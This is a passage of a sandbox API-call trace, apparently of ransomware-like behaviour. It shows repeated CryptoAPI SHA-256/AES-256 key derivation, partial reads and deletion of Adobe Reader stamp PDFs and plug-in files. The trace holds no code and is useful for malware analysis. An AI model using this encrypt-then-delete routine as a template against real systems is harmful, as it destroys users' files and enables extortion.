out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0215.544] CryptDestroyHash (hHash=0x284d668) returned 1 [0215.544] CryptDestroyKey (hKey=0x284d728) returned 1 [0215.544] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0215.546] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\faces.pdf")) returned 1 [0215.547] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0215.547] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0215.547] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0215.547] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0215.547] GetFileSize (in: hFile=0x674, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb731 [0215.547] ReadFile (in: hFile=0x674, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0215.575] CryptDestroyHash (hHash=0x284d768) returned 1 [0215.575] CryptDestroyKey (hKey=0x284d728) returned 1 [0215.575] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0215.576] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\pointers.pdf")) returned 1 [0215.578] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0215.578] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0215.578] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0215.578] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0215.578] GetFileSize (in: hFile=0x67c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x992b [0215.578] ReadFile (in: hFile=0x67c, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0215.582] CryptDestroyHash (hHash=0x284d668) returned 1 [0215.582] CryptDestroyKey (hKey=0x284d728) returned 1 [0215.582] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0215.584] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\signhere.pdf")) returned 1 [0215.585] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0215.585] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0215.585] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0215.585] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0215.586] GetFileSize (in: hFile=0x674, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1c4f5 [0215.586] ReadFile (in: hFile=0x674, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0215.620] CryptDestroyHash (hHash=0x284d768) returned 1 [0215.620] CryptDestroyKey (hKey=0x284d728) returned 1 [0215.620] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0215.621] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\standard.pdf")) returned 1 [0215.623] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0215.623] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0215.624] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0215.624] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0215.624] GetFileSize (in: hFile=0x67c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1804a [0215.624] ReadFile (in: hFile=0x67c, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0215.643] CryptDestroyHash (hHash=0x284d668) returned 1 [0215.643] CryptDestroyKey (hKey=0x284d728) returned 1 [0215.643] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0215.644] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\standardbusiness.pdf")) returned 1 [0215.650] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0215.652] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0215.652] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0215.652] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0215.652] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0215.652] GetFileSize (in: hFile=0x674, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18b15 [0215.652] ReadFile (in: hFile=0x674, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0215.692] CryptDestroyHash (hHash=0x284d768) returned 1 [0215.693] CryptDestroyKey (hKey=0x284d728) returned 1 [0215.693] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0215.693] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\dynamic.pdf")) returned 1 [0215.695] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0215.696] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0215.696] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0215.696] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0215.696] GetFileSize (in: hFile=0x67c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x80f5 [0215.696] ReadFile (in: hFile=0x67c, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0215.700] CryptDestroyHash (hHash=0x284d668) returned 1 [0215.700] CryptDestroyKey (hKey=0x284d728) returned 1 [0215.700] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0215.701] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\faces.pdf")) returned 1 [0215.702] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0215.703] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0215.703] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0215.703] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0215.703] GetFileSize (in: hFile=0x674, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb731 [0215.703] ReadFile (in: hFile=0x674, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0215.743] CryptDestroyHash (hHash=0x284d768) returned 1 [0215.743] CryptDestroyKey (hKey=0x284d728) returned 1 [0215.743] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0215.744] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\pointers.pdf")) returned 1 [0215.746] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0215.746] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0215.746] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0215.746] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0215.746] GetFileSize (in: hFile=0x67c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb189 [0215.746] ReadFile (in: hFile=0x67c, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0215.761] CryptDestroyHash (hHash=0x284d668) returned 1 [0215.761] CryptDestroyKey (hKey=0x284d728) returned 1 [0215.761] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0215.762] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\signhere.pdf")) returned 1 [0215.764] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0215.764] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0215.764] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0215.764] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0215.764] GetFileSize (in: hFile=0x674, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1c4f5 [0215.764] ReadFile (in: hFile=0x674, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0215.776] CryptDestroyHash (hHash=0x284d768) returned 1 [0215.776] CryptDestroyKey (hKey=0x284d728) returned 1 [0215.776] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0215.777] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\standard.pdf")) returned 1 [0215.779] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0215.780] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0215.780] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0215.780] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0215.780] GetFileSize (in: hFile=0x67c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x58891 [0215.780] ReadFile (in: hFile=0x67c, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0215.810] CryptDestroyHash (hHash=0x284d668) returned 1 [0215.810] CryptDestroyKey (hKey=0x284d728) returned 1 [0215.810] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0215.811] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\standardbusiness.pdf")) returned 1 [0215.815] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52568) returned 1 [0215.815] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0215.815] CryptHashData (hHash=0x284d5a8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0215.815] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d768) returned 1 [0215.815] GetFileSize (in: hFile=0x640, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1b772 [0215.815] ReadFile (in: hFile=0x640, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0215.833] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0215.833] CryptDestroyKey (hKey=0x284d768) returned 1 [0215.833] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0215.834] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\Words.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\words.pdf")) returned 1 [0215.842] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0215.843] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0215.843] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0215.843] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0215.843] GetFileSize (in: hFile=0x624, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5dbe63 [0215.843] ReadFile (in: hFile=0x624, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0216.466] CryptDestroyHash (hHash=0x284d628) returned 1 [0216.466] CryptDestroyKey (hKey=0x284d568) returned 1 [0216.466] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0216.467] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annots.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annots.api")) returned 1 [0216.475] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0216.475] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0216.475] CryptHashData (hHash=0x284d728, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0216.475] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0216.475] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd2463 [0216.475] ReadFile (in: hFile=0x588, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0216.629] CryptDestroyHash (hHash=0x284d728) returned 1 [0216.629] CryptDestroyKey (hKey=0x284d568) returned 1 [0216.629] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0216.630] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Checkers.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\checkers.api")) returned 1 [0216.637] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0216.638] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0216.638] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0216.638] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0216.638] GetFileSize (in: hFile=0x624, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x15de63 [0216.638] ReadFile (in: hFile=0x624, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0216.723] CryptDestroyHash (hHash=0x284d628) returned 1 [0216.723] CryptDestroyKey (hKey=0x284d568) returned 1 [0216.723] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0216.725] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\DigSig.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\digsig.api")) returned 1 [0216.728] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0216.729] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0216.729] CryptHashData (hHash=0x284d728, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0216.729] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0216.729] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x24a63 [0216.729] ReadFile (in: hFile=0x588, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0216.750] CryptDestroyHash (hHash=0x284d728) returned 1 [0216.750] CryptDestroyKey (hKey=0x284d568) returned 1 [0216.750] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0216.752] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\DVA.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\dva.api")) returned 1 [0216.754] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0216.754] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0216.754] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0216.754] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0216.754] GetFileSize (in: hFile=0x624, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd063 [0216.754] ReadFile (in: hFile=0x624, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0216.759] CryptDestroyHash (hHash=0x284d628) returned 1 [0216.759] CryptDestroyKey (hKey=0x284d568) returned 1 [0216.759] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0216.760] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\eBook.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\ebook.api")) returned 1 [0216.761] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0216.762] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0216.762] CryptHashData (hHash=0x284d728, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0216.762] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0216.762] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1ab863 [0216.762] ReadFile (in: hFile=0x588, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0216.875] CryptDestroyHash (hHash=0x284d728) returned 1 [0216.875] CryptDestroyKey (hKey=0x284d568) returned 1 [0216.875] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0216.876] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\EScript.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\escript.api")) returned 1 [0216.898] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0216.898] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0216.898] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0216.898] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0216.898] GetFileSize (in: hFile=0x624, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18463 [0216.899] ReadFile (in: hFile=0x624, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0216.905] CryptDestroyHash (hHash=0x284d628) returned 1 [0216.905] CryptDestroyKey (hKey=0x284d568) returned 1 [0216.905] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0216.906] DeleteFileW (lpFileName="C:\\Program Files 